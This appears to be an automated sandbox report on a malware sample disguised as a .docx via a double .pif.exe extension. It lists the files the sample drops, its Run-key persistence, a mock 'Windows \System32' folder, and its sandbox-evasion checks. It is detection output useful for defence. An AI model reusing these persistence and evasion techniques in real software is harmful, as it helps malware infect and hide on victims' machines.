              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_0298C4FC push ecx; mov dword ptr [esp], edx0_2_0298C501
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_0298D530 push 0298D55Ch; ret 0_2_0298D554
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_0298CB7C push 0298CD02h; ret 0_2_0298CCFA
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_0299789C push 02997919h; ret 0_2_02997911
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_0298C8AA push 0298CD02h; ret 0_2_0298CCFA
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_029968D8 push 02996983h; ret 0_2_0299697B
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_029968D6 push 02996983h; ret 0_2_0299697B
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_029A9874 push 029A9A60h; ret 0_2_029A9A58
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_029ADE98 push eax; ret 0_2_029ADF68
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_02999EBB push 02999EF4h; ret 0_2_02999EEC
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_02999EBC push 02999EF4h; ret 0_2_02999EEC
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_02992EF0 push 02992F66h; ret 0_2_02992F5E
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_02995E0C push ecx; mov dword ptr [esp], edx0_2_02995E0E
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_02992FFB push 02993049h; ret 0_2_02993041
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_02992FFC push 02993049h; ret 0_2_02993041
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_02997F18 push 02997F50h; ret 0_2_02997F48
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_02997C7C push 02997CBEh; ret 0_2_02997CB6
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_2_00419935 push edx; iretd 3_2_00419949
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_2_00419A3E push eax; ret 3_2_00419A41
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_2_00414324 push cs; iretd 3_2_004143FA
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_2_00414426 push cs; iretd 3_2_004143FA

              Persistence and Installation Behavior

              barindex
              Drops PE files with a suspicious file extension
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeFile created: C:\Users\Public\Libraries\drbdmeyP.pifJump to dropped file
              Source: C:\Windows\SysWOW64\extrac32.exeFile created: C:\Users\Public\Libraries\Pyemdbrd.PIFJump to dropped file
              Drops executables to the windows directory (C:\Windows) and starts them
              Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows \System32\per.exeJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_04586EB0 ShellExecuteW,URLDownloadToFileW,31_2_04586EB0
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeFile created: C:\Users\Public\Libraries\drbdmeyP.pifJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\xkn.exeJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Windows \System32\per.exeJump to dropped file
              Source: C:\Windows\SysWOW64\extrac32.exeFile created: C:\Users\Public\Libraries\Pyemdbrd.PIFJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\ger.exeJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\xkn.exeJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\ger.exeJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Windows \System32\per.exeJump to dropped file

              Boot Survival

              barindex
              Drops PE files to the user root directory
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\xkn.exeJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\ger.exeJump to dropped file
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0459AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,31_2_0459AA4A
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PyemdbrdJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PyemdbrdJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Uses an obfuscated file name to hide its real file extension (double extension)
              Source: Possible double extension: docx.pifStatic PE information: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_02999EF8 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_02999EF8
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\drbdmeyP.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\drbdmeyP.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\drbdmeyP.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\alpha.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Contains functionality to detect sleep reduction / modifications
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_0299CD740_2_0299CD74
              Delayed program exit found
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0458F7A7 Sleep,ExitProcess,31_2_0458F7A7
              Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-32948
              Opens the same file many times (likely Sandbox evasion)
              Source: C:\Windows\SysWOW64\colorcpl.exeFile opened: \Device\RasAcd count: 191293
              Powershell is started from unusual location (likely to bypass HIPS)
              Source: c:\users\public\xkn.exeKey value queried: Powershell behaviorJump to behavior
              Source: C:\Users\Public\xkn.exeMemory allocated: 1EC81490000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\Public\xkn.exeMemory allocated: 1EC81490000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,31_2_0459A748
              Source: C:\Users\Public\xkn.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\Public\Libraries\drbdmeyP.pifWindow / User API: threadDelayed 389Jump to behavior
              Source: C:\Users\Public\xkn.exeWindow / User API: threadDelayed 2191Jump to behavior
              Source: C:\Users\Public\xkn.exeWindow / User API: threadDelayed 974Jump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeWindow / User API: threadDelayed 1561
              Source: C:\Windows\SysWOW64\colorcpl.exeWindow / User API: threadDelayed 493
              Source: C:\Windows\SysWOW64\colorcpl.exeWindow / User API: threadDelayed 693
              Source: C:\Windows\SysWOW64\colorcpl.exeWindow / User API: foregroundWindowGot 1697
              Source: C:\Users\Public\alpha.exeAPI coverage: 6.3 %
              Source: C:\Users\Public\alpha.exeAPI coverage: 6.4 %
              Source: C:\Users\Public\alpha.exeAPI coverage: 8.1 %
              Source: C:\Users\Public\alpha.exeAPI coverage: 8.3 %
              Source: C:\Users\Public\alpha.exeAPI coverage: 8.3 %
              Source: C:\Windows\SysWOW64\colorcpl.exeAPI coverage: 9.9 %
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_0299CD740_2_0299CD74
              Source: C:\Users\Public\Libraries\drbdmeyP.pif TID: 1312Thread sleep count: 389 > 30Jump to behavior
              Source: C:\Users\Public\xkn.exe TID: 7316Thread sleep count: 2191 > 30Jump to behavior
              Source: C:\Users\Public\xkn.exe TID: 7316Thread sleep count: 974 > 30Jump to behavior
              Source: C:\Users\Public\xkn.exe TID: 7268Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exe TID: 8036Thread sleep time: -42500s >= -30000s
              Source: C:\Windows\SysWOW64\colorcpl.exe TID: 8040Thread sleep time: -4683000s >= -30000s
              Source: C:\Windows\SysWOW64\colorcpl.exe TID: 8024Thread sleep time: -493000s >= -30000s
              Source: C:\Windows\SysWOW64\colorcpl.exe TID: 8024Thread sleep time: -258000s >= -30000s
              Source: C:\Windows\SysWOW64\colorcpl.exe TID: 8040Thread sleep time: -2079000s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_029858B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_029858B4
